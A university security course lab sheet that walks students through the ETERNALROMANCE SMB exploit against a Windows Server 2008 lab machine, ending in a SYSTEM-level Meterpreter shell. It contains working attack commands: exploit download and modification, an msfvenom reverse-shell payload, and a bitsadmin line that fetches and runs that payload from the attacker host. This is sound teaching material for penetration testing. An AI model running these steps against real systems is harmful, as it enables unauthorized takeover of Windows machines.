Proj 15x: ETERNALROMANCE v. Windows Server 2008 (15 pts. extra credit)

What You Need for this Project

Purpose

To practice the ETERNALROMANCE attack. This awesome attack gives you SYSTEM on almost any Windows machine without the need for social engineering.

Preparing your Windows Target

Start the Windows target.

Click Start and type SHARING

Open "Network and Sharing Center"

Turn on these options, as shown below:

Click both Apply buttons, as shown below.

Open an Administrator Command Prompt and execute this command to enable the Guest account: 

net user guest /active:yes
The command succeeds, as shown below.

Finding the Target IP Address

On the Windows target, open a Command Prompt window and execute the IPCONFIG command.

Note the target's IP address.

Enumerating Named Pipes

Named pipes are an inter-process communications system used by Windows, and ETERNLROMANCE exploits them. So first, we need to find the available named pipes on the target.

On Kali, in a Terminal window, execute these commands, one at a time.

Replace the IP address with the IP address of your Windows target. 

msfconsole
use auxiliary/scanner/smb/pipe_auditor 
show info
set RHOSTS 172.16.1.191
exploit
A list of pipes appears, including netlogon, as shown below.

Exploiting the Target with ETERNALROMANCE

On Kali, in a Terminal window, execute these commands to download the exploit (into a file named 42315), download a Python library it needs, and run it: 
wget https://www.exploit-db.com/download/42315
wget https://github.com/worawit/MS17-010/raw/master/mysmb.py
python 42315
It runs, as shown below, asking for <ip> and [pipe_name].

We need to put the username into the exploit file.

On Kali, in a Terminal window, execute this command: 

nano 42315
Scroll down a page to find the USERNAME line. Insert the username GUEST as shown below.

Press Ctrl+X, Y, Enter to save the file.

On Kali, in a Terminal window, execute this command to exploit the target, replacing the IP address with the IP address of your Windows target: 

python 42315 172.16.1.191 netlogon
The exploit runs as shown below, ending with the message "creating file c:\pwned.txt on the target".

To see if it worked, on the Windows target, click Start, Computer.

Open drive C:. The pwned file should be visible, as shown below.

Saving the Screen Image

Make sure you can see the pwned file, as shown above.

Save a FULL DESKTOP image with the filename Proj 15xa from Your Name.

Executing Arbitrary Commands

The exploit above was a simple proof-of-concept. Now we'll modify the exploit to run an arbitrary command.

It's a good practice to keep any script that works, and copy it to a new script when making changes, so we'll do that.

On Kali, in a Terminal window, execute these commands to copy the exploit to a file named romance.py, and edit it with nano. 

cp 42315 romance.py
nano romance.py
In nano, press Ctrl+W to search. Enter a search string of pwned as shown below.

Press Enter.

Nano finds the string. Notice the red line beginning with "#service_exec", highlighted in the image below.

Remove the # character at the start of that line, as shown below. This uncomments it, so the command line inside it will execute. This command line creates a file named "pwned_exec".

Save the file with Ctrl+X, Y, Enter.

Exploiting the Target Again

On Kali, in a Terminal window, execute this command to exploit the target, replacing the IP address with the IP address of your Windows target: 
python romance.py 172.16.1.191 netlogon
The exploit runs as shown below, ending with a TIMEOUT error.

However, the exploit worked. To see that, on the Windows target, click Start, Computer.

Open drive C:. The pwned_exec file should be visible, as shown below.

Creating Meterpreter Malware

In Kali, execute these commands to create a malicious Windows executable file named "shell-service.exe" and serve it from a malicious Web server. It's an executable designed to run as a service.

Adjust the IP address to match the IP address of your Kali machine (the C&C server). This shell will use the default port of 4444. 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.188 -f exe-service > /var/www/html/shell-service.exe
service apache2 start

Start a Metasploit Handler

In Kali, open a new Terminal window and execute these commands to start a C&C listener. 
msfconsole
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
exploit
The listener starts, as shown below.

Inserting the Command Lines

On Kali, in a Terminal window, execute this command to edit romance.py: 
nano romance.py
In nano, press Ctrl+W to search. Enter a search string of pwned

Press Enter.

Nano finds the string. As before, we will modify the line beginning with "service_exec", highlighted in the image below.

In that line, carefully delete the text between the single quotes, as shown below.

Insert this line between the single quotes, as shown below. Replace the IP address with the IP address of your Kali machine. 

cmd /c bitsadmin /transfer wcb /priority high http://172.16.1.188/shell-service.exe C:\shell-service.exe &&  C:\shell-service.exe

Save the file with Ctrl+X, Y, Enter.

Exploiting the Target a Third Time

On Kali, in a Terminal window, execute this command to exploit the target, replacing the IP address with the IP address of your Windows target: 
python romance.py 172.16.1.191 netlogon
The exploit runs as shown below.

The Meterpreter window shows a shell opening.

Execute these commands to interact with the shell and see who you are: you are SYSTEM, as shown below. 

sessions -i 1
getuid

Saving the Screen Image

Make sure you can see these two required items, as shown above: Save a FULL DESKTOP image with the filename Proj 15xb from Your Name.

Turning in Your Project

Send the images as email attachments to cnit.124@gmail.com with a Subject line of Proj 15x from Your Name.

References

HOW TO EXPLOIT ETERNALROMANCE/SYNERGY TO GET A METERPRETER SESSION ON WINDOWS SERVER 2016
Posted 9-26-17 by Sam Bowne